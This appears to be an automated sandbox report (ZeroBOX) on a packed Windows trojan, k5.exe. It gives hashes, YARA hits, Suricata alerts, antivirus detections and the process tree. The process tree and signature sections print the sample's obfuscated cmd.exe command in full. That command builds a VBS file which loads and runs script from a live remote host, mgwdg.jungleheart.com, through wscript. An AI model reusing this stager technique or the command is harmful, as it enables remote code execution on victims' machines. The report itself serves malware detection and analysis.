Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 14, 2023, 2:33 p.m.	Sept. 14, 2023, 2:35 p.m.

Size	368.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`87f6774e25128d080fecd3fe5e15daa6`
SHA256	`4b348a11688dd83bf58edfb6020d5d3f5ea8cd017aaf6ff89592263896f055ca`
CRC32	`85C8ABC8`
ssdeep	`6144:YRQoL09mu6CHH9CZWUQKcSemuu6C3qECHH9CZWUQKcSemuu6C3qQc1:YWokcudCnx6C3fudCnx6C3Rc1`
PDB Path	C:\U2\wx6\Release\wx6.pdb
Yara	UPX_Zero - UPX packed file Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description) OS_Processor_Check_Zero - OS Processor Check

k5.exe "C:\Users\test22\AppData\Local\Temp\k5.exe"
524
- cmd.exe C:\Windows\system32\cmd.exe /c echo|set /p=^"d57=".":bxu0="i":nv7="g":nu25=":":GetO^">%Public%\sm86fa81.vbs&echo|set /p=^"bject("sCr"+bxu0+"pt"+nu25+"hT"+"Tps"+nu25+"//mgwdg"+d57+"jungleheart"+d57+"com//"+nv7+"1")^">>%Public%\sm86fa81.vbs&cd c:\windows\system32\&cmd /c start %Public%\sm86fa81.vbs
  496
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
    2104
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="d57=".":bxu0="i":nv7="g":nu25=":":GetO" 1>C:\Users\Public\sm86fa81.vbs"
    2140
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
    2224
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+bxu0+"pt"+nu25+"hT"+"Tps"+nu25+"//mgwdg"+d57+"jungleheart"+d57+"com//"+nv7+"1")" 1>>C:\Users\Public\sm86fa81.vbs"
    2260
  - cmd.exe cmd /c start C:\Users\Public\sm86fa81.vbs
    2328
    - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\sm86fa81.vbs"
      2388

Name	Response	Post-Analysis Lookup
mgwdg.jungleheart.com	A 206.71.149.162	206.71.149.162

IP Address	Status	Action
164.124.101.2	Active	Moloch
206.71.149.162	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49170 -> 206.71.149.162:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2035988	ET INFO DYNAMIC_DNS Query to a *.jungleheart .com Domain	Potentially Bad Traffic
TCP 206.71.149.162:443 -> 192.168.56.103:49173	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 206.71.149.162:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 206.71.149.162:443 -> 192.168.56.103:49174	2260001	SURICATA Applayer Wrong direction first Data	Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 14, 2023, 2:33 p.m.			0	0

This executable has a PDB path (1 event)

pdb_path

C:\U2\wx6\Release\wx6.pdb

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Sept. 14, 2023, 2:34 p.m.	stacktrace: CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x750bd08c TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x750b964b TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x750a4d6b TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x750a6f7c CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x750ae825 TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x750a6002 TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x750a5fe8 TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x750a49e3 TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x750a5a20 RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x778d9a91 LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x778f8f10 RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x778f8e5c ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x757f7a25 wscript+0x2fbd @ 0x642fbd BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25 exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4 exception.instruction: call dword ptr [ecx + 0xc] exception.module: MSCTF.dll exception.exception_code: 0xc0000005 exception.offset: 278260 exception.address: 0x750d3ef4 registers.esp: 3799020 registers.edi: 0 registers.eax: 5680216 registers.ebp: 3799048 registers.edx: 1 registers.ebx: 0 registers.esi: 9050936 registers.ecx: 1944925564	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Sept. 14, 2023, 2:34 p.m.

stacktrace:

CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x750bd08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x750b964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x750a4d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x750a6f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x750ae825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x750a6002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x750a5fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x750a49e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x750a5a20
RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x778d9a91
LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x778f8f10
RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x778f8e5c
ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x757f7a25
wscript+0x2fbd @ 0x642fbd
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x750d3ef4
registers.esp: 3799020
registers.edi: 0
registers.eax: 5680216
registers.ebp: 3799048
registers.edx: 1
registers.ebx: 0
registers.esi: 9050936
registers.ecx: 1944925564

Creates executable files on the filesystem (1 event)

file	C:\Users\Public\sm86fa81.vbs

Creates a suspicious process (4 events)

cmdline	C:\Windows\system32\cmd.exe /S /D /c" set /p="d57=".":bxu0="i":nv7="g":nu25=":":GetO" 1>C:\Users\Public\sm86fa81.vbs"
cmdline	C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+bxu0+"pt"+nu25+"hT"+"Tps"+nu25+"//mgwdg"+d57+"jungleheart"+d57+"com//"+nv7+"1")" 1>>C:\Users\Public\sm86fa81.vbs"
cmdline	C:\Windows\system32\cmd.exe /c echo\|set /p=^"d57=".":bxu0="i":nv7="g":nu25=":":GetO^">%Public%\sm86fa81.vbs&echo\|set /p=^"bject("sCr"+bxu0+"pt"+nu25+"hT"+"Tps"+nu25+"//mgwdg"+d57+"jungleheart"+d57+"com//"+nv7+"1")^">>%Public%\sm86fa81.vbs&cd c:\windows\system32\&cmd /c start %Public%\sm86fa81.vbs
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo"

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Wscript.exe initiated network communications indicative of a script based payload download (1 event)

Time & API	Arguments	Status	Return	Repeated
HttpOpenRequestW Sept. 14, 2023, 2:33 p.m.	connect_handle: 0x00cc0008 http_version: flags: 12582928 http_method: GET referer: path: //g1	1	13369356	0

File has been identified by 12 AntiVirus engines on VirusTotal as malicious (12 events)

Bkav	W32.AIDetectMalware
FireEye	Generic.mg.87f6774e25128d08
BitDefenderTheta	Gen:NN.ZexaF.36662.xuW@amwLjzhi
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
APEX	Malicious
Cynet	Malicious (score: 100)
Rising	Trojan.Generic@AI.96 (RDML:dDIpoxiglDXj0hXpLNu+UA)
SentinelOne	Static AI - Suspicious PE
MaxSecure	Trojan.Malware.300983.susgen
DeepInstinct	MALICIOUS
CrowdStrike	win/malicious_confidence_100% (D)

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (11 events)

Time & API	Arguments	Status	Return
HttpOpenRequestW Sept. 14, 2023, 2:33 p.m.	connect_handle: 0x00cc0008 http_version: flags: 12582928 http_method: GET referer: path: //g1	1	13369356
send Sept. 14, 2023, 2:33 p.m.	buffer: ! socket: 756 sent: 1	1	1
send Sept. 14, 2023, 2:33 p.m.	buffer: xte>þö=)QÍa1BfnøÐE¬jVw(sÖ/5 ÀÀÀ À 283ÿmgwdg.jungleheart.com socket: 876 sent: 125	1	125
send Sept. 14, 2023, 2:33 p.m.	buffer: ! socket: 756 sent: 1	1	1
send Sept. 14, 2023, 2:33 p.m.	buffer: ! socket: 756 sent: 1	1	1
send Sept. 14, 2023, 2:33 p.m.	buffer: xte?È-«Y0vrÏ¦µðô,öÂÍz6@/5 ÀÀÀ À 283ÿmgwdg.jungleheart.com socket: 876 sent: 125	1	125
send Sept. 14, 2023, 2:33 p.m.	buffer: ! socket: 756 sent: 1	1	1
send Sept. 14, 2023, 2:33 p.m.	buffer: ! socket: 756 sent: 1	1	1
send Sept. 14, 2023, 2:33 p.m.	buffer: 51e?5ßMhV¥åóAü.Ö¡ÂmgGÛ¹BÍ«ð ÿ socket: 876 sent: 58	1	58
send Sept. 14, 2023, 2:33 p.m.	buffer: ! socket: 756 sent: 1	1	1
send Sept. 14, 2023, 2:33 p.m.	buffer: ! socket: 756 sent: 1	1	1

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2328 resumed a thread in remote process 2388
NtResumeThread Sept. 14, 2023, 2:33 p.m.	thread_handle: 0x00000238 suspend_count: 1 process_identifier: 2388	1	0	0

The process wscript.exe wrote an executable file to disk (1 event)

file	C:\Windows\SysWOW64\wscript.exe

k5.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All